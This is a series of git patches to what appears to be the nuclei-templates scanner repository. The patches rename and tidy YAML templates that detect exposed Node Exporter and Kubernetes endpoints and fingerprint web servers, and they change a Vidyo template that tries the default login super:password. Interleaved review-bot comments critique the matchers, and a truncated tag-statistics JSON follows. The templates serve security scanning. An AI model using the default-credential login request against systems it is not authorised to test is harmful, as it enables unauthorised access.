@@ -1,27 +1,26 @@ id: node-exporter-metrics + info: name: Detect Node Exporter Metrics author: pussycat0x severity: low description: Information Disclosure of Garbage Collection - tags: node,exposure, metrics + tags: node,exposure,debug + requests: - method: GET path: - - "{{BaseURL}}:9100/metrics" + - "{{BaseURL}}/metrics" + matchers-condition: and matchers: - type: word part: body words: - - "go_goroutines" - - "HELP" - - "gauge" - "node_cooling_device" - "node_network" - - "boot" - - "TYPE go_goroutines gauge" condition: and + - type: status status: - 200 \ No newline at end of file From 969e08f12e2b6be23cab5db9c2ddd1ef7f77c6ba Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 15:54:24 +0530 Subject: [PATCH 042/339] moving files around --- .../{ => kubernetes}/kubernetes-metrics.yaml | 0 .../{ => kubernetes}/kubernetes-pods.yaml | 4 +++- .../kubernetes-resource-report.yaml} | 14 +++++++------- technologies/abyss-web-server.yaml | 12 ++++++++---- technologies/kubernetes-enterprise-manager.yaml | 12 ++++++++---- ...netes-engine.yaml => kubernetes-mirantis.yaml} | 14 +++++++++----- technologies/oracle-iplanet-web-server.yaml | 15 +++++++++------ 7 files changed, 44 insertions(+), 27 deletions(-) rename misconfiguration/{ => kubernetes}/kubernetes-metrics.yaml (100%) rename misconfiguration/{ => kubernetes}/kubernetes-pods.yaml (97%) rename misconfiguration/{overview-kubernetes-resource-report.yaml => kubernetes/kubernetes-resource-report.yaml} (59%) rename technologies/{mirantis-kubernetes-engine.yaml => kubernetes-mirantis.yaml} (56%) diff --git a/misconfiguration/kubernetes-metrics.yaml b/misconfiguration/kubernetes/kubernetes-metrics.yaml similarity index 100% rename from misconfiguration/kubernetes-metrics.yaml rename to misconfiguration/kubernetes/kubernetes-metrics.yaml 
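Review bot: The trimmed word matcher requires both `node_cooling_device` and `node_network` under `condition: and`, and as far as I know `node_cooling_device_*` only comes from node_exporter's thermal_zone collector, which emits nothing on hosts without `/sys/class/thermal` entries (most VMs and containers), so a large share of exposed exporters would no longer be reported — please check against a sample response from a cloud instance. `node_exporter_build_info` is emitted by every node_exporter regardless of hardware and is the usual fingerprint, so `- "node_exporter_build_info"` alongside `- "node_network"` keeps the AND strict without that blind spot. The `description: Information Disclosure of Garbage Collection` context line describes nothing this template matches and is shared verbatim with kubernetes-metrics.yaml.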
diff --git a/misconfiguration/kubernetes-pods.yaml b/misconfiguration/kubernetes/kubernetes-pods.yaml similarity index 97% rename from misconfiguration/kubernetes-pods.yaml rename to misconfiguration/kubernetes/kubernetes-pods.yaml index 97e6143374..2ac2d71c59 100644 --- a/misconfiguration/kubernetes-pods.yaml +++ b/misconfiguration/kubernetes/kubernetes-pods.yaml @@ -13,16 +13,18 @@ requests: path: - '{{BaseURL}}/pods' - '{{BaseURL}}/api/v1/pods' + matchers-condition: and matchers: - type: word words: - "apiVersion" - part: body + - type: word words: - "application/json" part: header + - type: status status: - 200 diff --git a/misconfiguration/overview-kubernetes-resource-report.yaml b/misconfiguration/kubernetes/kubernetes-resource-report.yaml similarity index 59% rename from misconfiguration/overview-kubernetes-resource-report.yaml rename to misconfiguration/kubernetes/kubernetes-resource-report.yaml index 34d9dca54d..64c518fa31 100644 --- a/misconfiguration/overview-kubernetes-resource-report.yaml +++ b/misconfiguration/kubernetes/kubernetes-resource-report.yaml @@ -1,24 +1,24 @@ -id: overview-kubernetes-resource-report +id: kubernetes-resource-report + info: name: Detect Overview Kubernetes Resource Report author: pussycat0x severity: medium description: Information Disclosure of Kubernetes Resource Report - tags: Kubernetes,exposure + tags: kubernetes,exposure + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Overview - Kubernetes Resource Report" - - "Pods" - - "Worker Nodes" - - "Applications" - condition: and + - "Overview - Kubernetes Resource Report" + - type: status status: - 200 diff --git a/technologies/abyss-web-server.yaml b/technologies/abyss-web-server.yaml index 2e65c1eef3..a760447d4b 100644 --- a/technologies/abyss-web-server.yaml +++ b/technologies/abyss-web-server.yaml 
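Review bot: In the kubernetes-pods hunk the first matcher keys on the single word `apiVersion`, which appears in every Kubernetes API object and in any JSON or HTML page that quotes a manifest, so together with `application/json` and a 200 it will also flag read-only API front-ends and documentation endpoints rather than just an exposed kubelet or API-server pod list. Both `/pods` and `/api/v1/pods` return a `PodList` object when the listing is actually exposed, so adding `- "PodList"` to the `words:` list with `condition: and` pins the match to the pod listing itself — verify the exact `kind` spelling in a live response before relying on it. The `method`/`path` header of this request block starts above the hunk.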
@@ -1,21 +1,25 @@ -id: abyss-web-server-detect +id: abyss-web-server + info: name: Detect Abyss Web Server author: pussycat0x severity: info tags: tech - reference: app="Abyss-Web-Server" -fofa query + additional-fields: + fofa-dork: 'app="Abyss-Web-Server"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Welcome to Abyss Web Server" - condition: and + - "Welcome to Abyss Web Server" + - type: status status: - 200 \ No newline at end of file diff --git a/technologies/kubernetes-enterprise-manager.yaml b/technologies/kubernetes-enterprise-manager.yaml index ed6241c0f9..3a22e2d120 100644 --- a/technologies/kubernetes-enterprise-manager.yaml +++ b/technologies/kubernetes-enterprise-manager.yaml @@ -1,21 +1,25 @@ id: kubernetes-enterprise-manager + info: name: Detect Kubernetes Enterprise Manager author: pussycat0x severity: info - tags: tech - reference: app="Kubernetes-Enterprise-Manager" -fofa query + tags: tech,kubernetes + additional-fields: + fofa-dork: 'app="Kubernetes-Enterprise-Manager"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Kubernetes Enterprise Manager" - condition: and + - "Kubernetes Enterprise Manager" + - type: status status: - 200 \ No newline at end of file diff --git a/technologies/mirantis-kubernetes-engine.yaml b/technologies/kubernetes-mirantis.yaml similarity index 56% rename from technologies/mirantis-kubernetes-engine.yaml rename to technologies/kubernetes-mirantis.yaml index 9988ad9a0f..34516924bc 100644 --- a/technologies/mirantis-kubernetes-engine.yaml +++ b/technologies/kubernetes-mirantis.yaml 
@@ -1,21 +1,25 @@ -id: mirantis-kubernetes-engine +id: kubernetes-mirantis + info: name: Detect Mirantis Kubernetes Engine author: pussycat0x severity: info - tags: tech - reference: app="Mirantis-Kubernetes-Engine" -fofa query + tags: tech,kubernetes + additional-fields: + fofa-dork: 'app="Mirantis-Kubernetes-Engine"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Mirantis Kubernetes Engine" - condition: and + - "Mirantis Kubernetes Engine" + - type: status status: - 200 \ No newline at end of file diff --git a/technologies/oracle-iplanet-web-server.yaml b/technologies/oracle-iplanet-web-server.yaml index abdc9fc14e..12d06c6232 100644 --- a/technologies/oracle-iplanet-web-server.yaml +++ b/technologies/oracle-iplanet-web-server.yaml @@ -1,22 +1,25 @@ -id: oracle-iplanet-web-server-detect +id: oracle-iplanet-web-server + info: name: Detect Oracle-iPlanet-Web-Server author: pussycat0x severity: info - tags: tech - reference: app="Oracle-iPlanet-Web-Server -fofa query + tags: tech,oracle + additional-fields: + fofa-dork: 'app="Oracle-iPlanet-Web-Server' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Oracle iPlanet Web Server 7.0" - - "Oracle iPlanet Web Server" - condition: and + - "Oracle iPlanet Web Server" + - type: status status: - 200 \ No newline at end of file From ae801e87eb8eb881d1c5bbb3fb5132f96209f561 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 16:38:32 +0530 Subject: [PATCH 043/339] minor update --- ...in.yaml => vidyo-default-credentials.yaml} | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) rename default-logins/vidyo/{vidyo-super-admin.yaml => vidyo-default-credentials.yaml} (76%) 
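Review bot: In the oracle-iplanet-web-server hunk, `fofa-dork: 'app="Oracle-iPlanet-Web-Server'` is missing the closing double quote inside the single-quoted scalar, so the dork copied from this template is not a valid FOFA query; the three sibling templates rewritten in the same commit (`'app="Abyss-Web-Server"'`, `'app="Kubernetes-Enterprise-Manager"'`, `'app="Mirantis-Kubernetes-Engine"'`) have it. It should read `fofa-dork: 'app="Oracle-iPlanet-Web-Server"'`. The old `reference:` line carried the same missing quote and this commit copied it over rather than fixing it.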
diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-default-credentials.yaml similarity index 76% rename from default-logins/vidyo/vidyo-super-admin.yaml rename to default-logins/vidyo/vidyo-default-credentials.yaml index 0749aa4548..1c27bad550 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-default-credentials.yaml @@ -5,6 +5,7 @@ info: author: izn0u severity: medium description: test for default cred super:password + reference: https://support.vidyocloud.com/hc/en-us/articles/226265128 tags: vidyo,default-login @@ -20,19 +21,11 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Origin: {{BaseURL}} - Referer: http://{{Hostname}}/super/login.html?lang=en + Referer: {{RootURL}}/super/login.html?lang=en Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en username=super&password=password - - | - GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}} HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}}/super/login.html?lang=en - - cookie-reuse: true - redirects: true - extractors: - type: regex name: csrf_tkn @@ -49,7 +42,13 @@ requests: kval: - JSESSIONID + matchers-condition: and matchers: - type: word + part: header words: - - "Vidyo MainSuperAdmin" + - "/super/index.html" + + - type: status + status: + - 302 \ No newline at end of file From 23f69a2a21af1a955bd9f396c7696ca073b26caa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 4 Sep 2021 11:18:38 +0000 Subject: [PATCH 044/339] Auto Generated Templates Stats [Sat Sep 4 11:18:38 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1463 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 747 insertions(+), 738 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 1aab383f1d..01a0ac282d 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json 
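Review bot: The second hunk deletes the `GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}}` request, which was the only consumer of the `csrf_tkn` extractor still declared on the hunk's last line, so that extractor now only adds a value to the output unless it is marked `internal: true` (its body continues below the hunk, so I cannot see whether it already is) — either drop it or add `internal: true` under `name: csrf_tkn`. With `redirects: true` removed, the new `status: 302` plus `/super/index.html` header matcher in the last hunk only works because nuclei now stops at the login redirect, so re-adding redirect following would silently break the check; a one-line comment above `matchers-condition: and` such as `# login success is the 302 to /super/index.html; do not enable redirects here` protects that. The `{{session}}` cookie on the POST still depends on the kval extractor declared after the hunk, which is also worth stating next to the `Cookie:` line.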
@@ -1 +1 @@ -{"tags":[{"name":"cve","count":649},{"name":"panel","count":236},{"name":"xss","count":224},{"name":"lfi","count":221},{"name":"exposure","count":217},{"name":"wordpress","count":205},{"name":"rce","count":190},{"name":"cve2020","count":157},{"name":"wp-plugin","count":138},{"name":"tech","count":106},{"name":"cve2021","count":106},{"name":"config","count":93},{"name":"cve2019","count":91},{"name":"cve2018","count":80},{"name":"takeover","count":74},{"name":"apache","count":66},{"name":"","count":66},{"name":"token","count":64},{"name":"default-login","count":58},{"name":"iot","count":56},{"name":"joomla","count":52},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"oob","count":45},{"name":"cve2010","count":44},{"name":"network","count":39},{"name":"sqli","count":37},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"oracle","count":30},{"name":"logs","count":30},{"name":"workflow","count":30},{"name":"jira","count":28},{"name":"misc","count":27},{"name":"atlassian","count":27},{"name":"redirect","count":26},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"router","count":19},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"cve2015","count":19},{"name":"sap","count":18},{"name":"disclosure","count":18},{"name":"auth-bypass","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":14},{"name":"cve2012","count":14},{"name":"cve2011","count":13},{"name":"misconfig","count":13},{"name":"fuzz","count":13},{"name":"struts","count":13},{"name":"android","count":13},{"name":"jenkins","count":12},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"php","count":12},{"name":"adobe","count":12},{"name":"dlink","count":12},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"devops","count":11},{"name":"ftp","count":9},{"name":"aws","count":9},{"name":"magento","count":9},{"name":"xxe","count":9},{"name":
"cnvd","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"ruijie","count":8},{"name":"login","count":8},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"cve2009","count":7},{"name":"nginx","count":7},{"name":"cms","count":7},{"name":"backup","count":7},{"name":"vmware","count":7},{"name":"jetty","count":6},{"name":"files","count":6},{"name":"google","count":6},{"name":"dell","count":6},{"name":"netgear","count":6},{"name":"solr","count":6},{"name":"django","count":6},{"name":"laravel","count":6},{"name":"cve2008","count":6},{"name":"coldfusion","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"confluence","count":5},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":5},{"name":"drupal","count":5},{"name":"microsoft","count":5},{"name":"printer","count":5},{"name":"headless","count":5},{"name":"wp-theme","count":5},{"name":"java","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"phpmyadmin","count":5},{"name":"wso2","count":4},{"name":"nodejs","count":4},{"name":"tomcat","count":4},{"name":"crlf","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"asp","count":4},{"name":"jolokia","count":4},{"name":"hp","count":4},{"name":"traversal","count":4},{"name":"zimbra","count":4},{"name":"vpn","count":4},{"name":"thinkcmf","count":4},{"name":"elastic","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"moodle","count":4},{"name":"exchange","count":4},{"name":"firmware","count":4},{"name":"thinkphp","count":4},{"name":"hongdian","count":4},{"name":"magmi","count":4},{"name":"deserialization","count":4},{"name":"samsung","count":4},{"name":"glpi","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"fanruan","count":3},{"name":"caucho",
"count":3},{"name":"lfr","count":3},{"name":"opensis","count":3},{"name":"amazon","count":3},{"name":"openssh","count":3},{"name":"bypass","count":3},{"name":"kevinlab","count":3},{"name":"slack","count":3},{"name":"intrusive","count":3},{"name":"backups","count":3},{"name":"nexus","count":3},{"name":"httpd","count":3},{"name":"kubernetes","count":3},{"name":"oa","count":3},{"name":"mongodb","count":3},{"name":"vbulletin","count":3},{"name":"nacos","count":3},{"name":"ebs","count":3},{"name":"terramaster","count":3},{"name":"targa","count":3},{"name":"kafka","count":3},{"name":"bitrix","count":3},{"name":"microstrategy","count":3},{"name":"ssh","count":3},{"name":"zabbix","count":3},{"name":"zhiyuan","count":3},{"name":"ofbiz","count":3},{"name":"resin","count":3},{"name":"log","count":3},{"name":"tikiwiki","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"git","count":3},{"name":"fpd","count":3},{"name":"itop","count":3},{"name":"nosqli","count":3},{"name":"jellyfin","count":2},{"name":"chamilo","count":2},{"name":"strapi","count":2},{"name":"igs","count":2},{"name":"showdoc","count":2},{"name":"voipmonitor","count":2},{"name":"wordfence","count":2},{"name":"smtp","count":2},{"name":"axis2","count":2},{"name":"frp","count":2},{"name":"mail","count":2},{"name":"splunk","count":2},{"name":"kentico","count":2},{"name":"emerge","count":2},{"name":"prestashop","count":2},{"name":"trixbox","count":2},{"name":"saltstack","count":2},{"name":"rockethchat","count":2},{"name":"ec2","count":2},{"name":"hjtcloud","count":2},{"name":"maian","count":2},{"name":"bigip","count":2},{"name":"cve2005","count":2},{"name":"chiyu","count":2},{"name":"odoo","count":2},{"name":"mida","count":2},{"name":"openfire","count":2},{"name":"service","count":2},{"name":"sharepoint","count":2},{"name":"yapi","count":2},{"name":"horde","count":2},{"name":"vrealize","count":2},{"name":"webcam","count":2},{"name":"akkadian","count":2},{"name":"flir","count":2},{"name":"
avantfax","count":2},{"name":"xxljob","count":2},{"name":"hasura","count":2},{"name":"axis","count":2},{"name":"dolibarr","count":2},{"name":"nextjs","count":2},{"name":"ucmdb","count":2},{"name":"azure","count":2},{"name":"oauth","count":2},{"name":"hashicorp","count":2},{"name":"ecology","count":2},{"name":"huawei","count":2},{"name":"fortios","count":2},{"name":"jboss","count":2},{"name":"jsf","count":2},{"name":"nagios","count":2},{"name":"guacamole","count":2},{"name":"keycloak","count":2},{"name":"rstudio","count":2},{"name":"firebase","count":2},{"name":"kibana","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"paloalto","count":2},{"name":"hpe","count":2},{"name":"couchdb","count":2},{"name":"middleware","count":2},{"name":"telerik","count":2},{"name":"shellshock","count":2},{"name":"phpcollab","count":2},{"name":"github","count":2},{"name":"mcafee","count":2},{"name":"prometheus","count":2},{"name":"natshell","count":2},{"name":"seeyon","count":2},{"name":"grav","count":2},{"name":"glassfish","count":2},{"name":"proxy","count":2},{"name":"hoteldruid","count":2},{"name":"geowebserver","count":2},{"name":"backdoor","count":2},{"name":"status","count":2},{"name":"sonarqube","count":2},{"name":"plesk","count":2},{"name":"sonicwall","count":2},{"name":"akamai","count":2},{"name":"linkerd","count":2},{"name":"injection","count":2},{"name":"globalprotect","count":2},{"name":"waf","count":2},{"name":"openam","count":2},{"name":"idrac","count":2},{"name":"spark","count":2},{"name":"smb","count":2},{"name":"icewarp","count":2},{"name":"cve2007","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"pega","count":2},{"name":"cache","count":2},{"name":"netis","count":2},{"name":"dos","count":2},{"name":"bigbluebutton","count":1},{"name":"cacti","count":1},{"name":"b2evolution","count":1},{"name":"clave","count":1},{"name":"fastapi","count":1},{"name":"smartblog","count":1},{"name":"alibaba","count":1},{"name":"tongda","
count":1},{"name":"zend","count":1},{"name":"api-manager","count":1},{"name":"zcms","count":1},{"name":"shopxo","count":1},{"name":"ns","count":1},{"name":"xdcms","count":1},{"name":"codemeter","count":1},{"name":"appweb","count":1},{"name":"rubedo","count":1},{"name":"vsftpd","count":1},{"name":"upload","count":1},{"name":"alertmanager","count":1},{"name":"argussurveillance","count":1},{"name":"sceditor","count":1},{"name":"chevereto","count":1},{"name":"expressjs","count":1},{"name":"empirecms","count":1},{"name":"goahead","count":1},{"name":"apiman","count":1},{"name":"nuuo","count":1},{"name":"dotnetnuke","count":1},{"name":"redcap","count":1},{"name":"panos","count":1},{"name":"ricoh","count":1},{"name":"javamelody","count":1},{"name":"xmlchart","count":1},{"name":"cgi","count":1},{"name":"smi","count":1},{"name":"trilithic","count":1},{"name":"lighttpd","count":1},{"name":"klog","count":1},{"name":"pulsesecure","count":1},{"name":"kafdrop","count":1},{"name":"selea","count":1},{"name":"sco","count":1},{"name":"zmanda","count":1},{"name":"getsimple","count":1},{"name":"openx","count":1},{"name":"adminer","count":1},{"name":"idemia","count":1},{"name":"timesheet","count":1},{"name":"sarg","count":1},{"name":"landray","count":1},{"name":"flink","count":1},{"name":"lanproxy","count":1},{"name":"circontrol","count":1},{"name":"ruby","count":1},{"name":"opensmtpd","count":1},{"name":"default","count":1},{"name":"ewebs","count":1},{"name":"rmc","count":1},{"name":"whm","count":1},{"name":"tracer","count":1},{"name":"camera","count":1},{"name":"lg-nas","count":1},{"name":"resourcespace","count":1},{"name":"comodo","count":1},{"name":"xiuno","count":1},{"name":"ambari","count":1},{"name":"zm","count":1},{"name":"froxlor","count":1},{"name":"clockwatch","count":1},{"name":"st","count":1},{"name":"mysql","count":1},{"name":"pippoint","count":1},{"name":"parentlink","count":1},{"name":"openerp","count":1},{"name":"linux","count":1},{"name":"ilo4","count":1},{"name":"camun
da","count":1},{"name":"rujjie","count":1},{"name":"servicedesk","count":1},{"name":"jnoj","count":1},{"name":"acexy","count":1},{"name":"phpfusion","count":1},{"name":"redhat","count":1},{"name":"octobercms","count":1},{"name":"xvr","count":1},{"name":"phpinfo","count":1},{"name":"fortigates","count":1},{"name":"opm","count":1},{"name":"kong","count":1},{"name":"yii","count":1},{"name":"triconsole","count":1},{"name":"vnc","count":1},{"name":"clickhouse","count":1},{"name":"bash","count":1},{"name":"webui","count":1},{"name":"huijietong","count":1},{"name":"codeigniter","count":1},{"name":"cocoon","count":1},{"name":"memcached","count":1},{"name":"circontrorl","count":1},{"name":"visualtools","count":1},{"name":"domxss","count":1},{"name":"node-red-dashboard","count":1},{"name":"sourcebans","count":1},{"name":"clink-office","count":1},{"name":"scimono","count":1},{"name":"auth","count":1},{"name":"pyramid","count":1},{"name":"csrf","count":1},{"name":"dom","count":1},{"name":"vscode","count":1},{"name":"socomec","count":1},{"name":"eyelock","count":1},{"name":"74cms","count":1},{"name":"duomicms","count":1},{"name":"svnserve","count":1},{"name":"discord","count":1},{"name":"bolt","count":1},{"name":"acontent","count":1},{"name":"tika","count":1},{"name":"concrete","count":1},{"name":"zookeeper","count":1},{"name":"aruba","count":1},{"name":"enum","count":1},{"name":"flash","count":1},{"name":"zeroshell","count":1},{"name":"nedi","count":1},{"name":"adb","count":1},{"name":"commax","count":1},{"name":"ulterius","count":1},{"name":"opensns","count":1},{"name":"fuelcms","count":1},{"name":"apos","count":1},{"name":"nomad","count":1},{"name":"livezilla","count":1},{"name":"robomongo","count":1},{"name":"payara","count":1},{"name":"redis","count":1},{"name":"thinkadmin","count":1},{"name":"monitorix","count":1},{"name":"aura","count":1},{"name":"jsp","count":1},{"name":"javafaces","count":1},{"name":"myucms","count":1},{"name":"mautic","count":1},{"name":"mirai","count"
:1},{"name":"expose","count":1},{"name":"stem","count":1},{"name":"xunchi","count":1},{"name":"acme","count":1},{"name":"qcubed","count":1},{"name":"ioncube","count":1},{"name":"proftpd","count":1},{"name":"iptime","count":1},{"name":"phpfastcache","count":1},{"name":"fortiweb","count":1},{"name":"nsasg","count":1},{"name":"2014","count":1},{"name":"rdp","count":1},{"name":"manageengine","count":1},{"name":"centos","count":1},{"name":"announcekit","count":1},{"name":"dvwa","count":1},{"name":"monitorr","count":1},{"name":"cherokee","count":1},{"name":"phpunit","count":1},{"name":"servicenow","count":1},{"name":"glances","count":1},{"name":"fedora","count":1},{"name":"mdb","count":1},{"name":"exponentcms","count":1},{"name":"geutebruck","count":1},{"name":"dompdf","count":1},{"name":"trane","count":1},{"name":"lotuscms","count":1},{"name":"springframework","count":1},{"name":"crm","count":1},{"name":"extractor","count":1},{"name":"plastic","count":1},{"name":"nc2","count":1},{"name":"processmaker","count":1},{"name":"moin","count":1},{"name":"nps","count":1},{"name":"websvn","count":1},{"name":"sophos","count":1},{"name":"cobub","count":1},{"name":"weiphp","count":1},{"name":"solman","count":1},{"name":"ssl","count":1},{"name":"alerta","count":1},{"name":"jquery","count":1},{"name":"chinaunicom","count":1},{"name":"spectracom","count":1},{"name":"netrc","count":1},{"name":"tapestry","count":1},{"name":"blue-ocean","count":1},{"name":"ueditor","count":1},{"name":"accela","count":1},{"name":"nweb2fax","count":1},{"name":"faraday","count":1},{"name":"keenetic","count":1},{"name":"salesforce","count":1},{"name":"totaljs","count":1},{"name":"hortonworks","count":1},{"name":"ems","count":1},{"name":"upnp","count":1},{"name":"bitly","count":1},{"name":"uwsgi","count":1},{"name":"kubeflow","count":1},{"name":"tectuus","count":1},{"name":"enumeration","count":1},{"name":"rabbitmq","count":1},{"name":"ilo","count":1},{"name":"varnish","count":1},{"name":"plugin","count":1},{"n
ame":"majordomo2","count":1},{"name":"anchorcms","count":1},{"name":"logontracer","count":1},{"name":"labtech","count":1},{"name":"mantis","count":1},{"name":"sureline","count":1},{"name":"traefik","count":1},{"name":"wuzhicms","count":1},{"name":"phalcon","count":1},{"name":"pacsone","count":1},{"name":"mongoshake","count":1},{"name":"spf","count":1},{"name":" default-login","count":1},{"name":"oneblog","count":1},{"name":"azkaban","count":1},{"name":"geddy","count":1},{"name":"zte","count":1},{"name":"sitecore","count":1},{"name":"k8","count":1},{"name":"oscommerce","count":1},{"name":"bruteforce","count":1},{"name":"owasp","count":1},{"name":"mariadb","count":1},{"name":"db","count":1},{"name":"gotmls","count":1},{"name":"portainer","count":1},{"name":"grails","count":1},{"name":"webmodule-ee","count":1},{"name":"office365","count":1},{"name":"pgadmin","count":1},{"name":"magicflow","count":1},{"name":"jitsi","count":1},{"name":"cyberoam","count":1},{"name":"couchbase","count":1},{"name":"visionhub","count":1},{"name":"postgres","count":1},{"name":"beanshell","count":1},{"name":"razor","count":1},{"name":"emby","count":1},{"name":"sqlite","count":1},{"name":"diris","count":1},{"name":"openstack","count":1},{"name":"yealink","count":1},{"name":"tjws","count":1},{"name":"metinfo","count":1},{"name":"exposures","count":1},{"name":"openrestry","count":1},{"name":"jeewms","count":1},{"name":"lansweeper","count":1},{"name":"calendarix","count":1},{"name":"nexusdb","count":1},{"name":"webmin","count":1},{"name":"mobileiron","count":1},{"name":"netsweeper","count":1},{"name":"ecom","count":1},{"name":"embedthis","count":1},{"name":"commscope","count":1},{"name":"opencast","count":1},{"name":"esmtp","count":1},{"name":"dbeaver","count":1},{"name":"plone","count":1},{"name":"wazuh","count":1},{"name":"hiboss","count":1},{"name":"biometrics","count":1},{"name":"kyan","count":1},{"name":"jfrog","count":1},{"name":"javascript","count":1},{"name":"wildfly","count":1},{"name":"
cerebro","count":1},{"name":"checkpoint","count":1},{"name":"dvr","count":1},{"name":"eprints","count":1},{"name":"zenario","count":1},{"name":"wiki","count":1},{"name":"xml","count":1},{"name":"ruckus","count":1},{"name":"ntopng","count":1},{"name":"cloudflare","count":1},{"name":"interlib","count":1},{"name":"feifeicms","count":1},{"name":"rhymix","count":1},{"name":"zzzcms","count":1},{"name":"linkedin","count":1},{"name":"svn","count":1},{"name":"hadoop","count":1},{"name":"fastcgi","count":1},{"name":"maccmsv10","count":1},{"name":"cors","count":1},{"name":"fortigate","count":1},{"name":"redwood","count":1},{"name":"solarlog","count":1},{"name":"darkstat","count":1},{"name":"sprintful","count":1},{"name":"plc","count":1},{"name":"k8s","count":1},{"name":"sidekiq","count":1},{"name":"gateone","count":1},{"name":"emc","count":1},{"name":"qvisdvr","count":1},{"name":"timeclock","count":1},{"name":"zarafa","count":1},{"name":"gloo","count":1},{"name":"etouch","count":1},{"name":"fortinet","count":1},{"name":"skywalking","count":1},{"name":"linksys","count":1},{"name":"netgenie","count":1},{"name":"spring","count":1},{"name":"csod","count":1},{"name":"lutron","count":1},{"name":"node","count":1},{"name":"fiori","count":1},{"name":"wamp","count":1},{"name":"yachtcontrol","count":1},{"name":"landrayoa","count":1},{"name":"pcoip","count":1},{"name":"tensorboard","count":1},{"name":"floc","count":1},{"name":"rmi","count":1},{"name":"avtech","count":1},{"name":"netdata","count":1},{"name":"bullwark","count":1},{"name":"h3c-imc","count":1},{"name":"mpsec","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"nette","count":1},{"name":"sentry","count":1},{"name":"sangfor","count":1},{"name":"primetek","count":1},{"name":"seacms","count":1},{"name":"tenda","count":1},{"name":"szhe","count":1},{"name":"jenzabar","count":1},{"name":"avalanche","count":1},{"name":"blind","count":1},{"name":"rsyncd","count":1},{"name":"jmx","count":1},{"name":"opentsd
b","count":1},{"name":"qdpm","count":1},{"name":"wavemaker","count":1},{"name":"smartsense","count":1},{"name":"email","count":1},{"name":"panabit","count":1},{"name":"mantisbt","count":1},{"name":"sgp","count":1},{"name":"scs","count":1},{"name":"postmessage","count":1},{"name":"vsphere","count":1},{"name":"heroku","count":1},{"name":"pagespeed","count":1},{"name":"ganglia","count":1},{"name":"sage","count":1},{"name":"xff","count":1},{"name":"wmt","count":1},{"name":"favicon","count":1},{"name":"viewlinc","count":1},{"name":"miscrsoft","count":1},{"name":"simplecrm","count":1},{"name":"subrion","count":1},{"name":"influxdb","count":1},{"name":"krweb","count":1},{"name":"zyxel","count":1},{"name":"turbocrm","count":1},{"name":"gogs","count":1},{"name":"rfi","count":1},{"name":"lancom","count":1},{"name":"druid","count":1},{"name":"discourse","count":1},{"name":"eyou","count":1},{"name":"owa","count":1},{"name":"drone","count":1},{"name":"iceflow","count":1},{"name":"arl","count":1},{"name":"octoprint","count":1},{"name":"twitter-server","count":1},{"name":"openemr","count":1},{"name":"synnefo","count":1},{"name":"spidercontrol","count":1},{"name":"qsan","count":1},{"name":"cve2006","count":1},{"name":"dotnet","count":1},{"name":"achecker","count":1},{"name":"cofax","count":1},{"name":"gitlist","count":1},{"name":"tamronos","count":1},{"name":"moinmoin","count":1},{"name":"powercreator","count":1},{"name":"wondercms","count":1},{"name":"wifisky","count":1},{"name":"saltapi","count":1},{"name":"realteo","count":1},{"name":"tensorflow","count":1},{"name":"mara","count":1},{"name":"tileserver","count":1},{"name":"addpac","count":1},{"name":"npm","count":1},{"name":"bookstack","count":1},{"name":"perl","count":1},{"name":"webftp","count":1},{"name":"kerbynet","count":1},{"name":"asus","count":1},{"name":"tpshop","count":1},{"name":"soar","count":1},{"name":"haproxy","count":1},{"name":"starttls","count":1},{"name":"gespage","count":1},{"name":"liferay","count":1},{"name
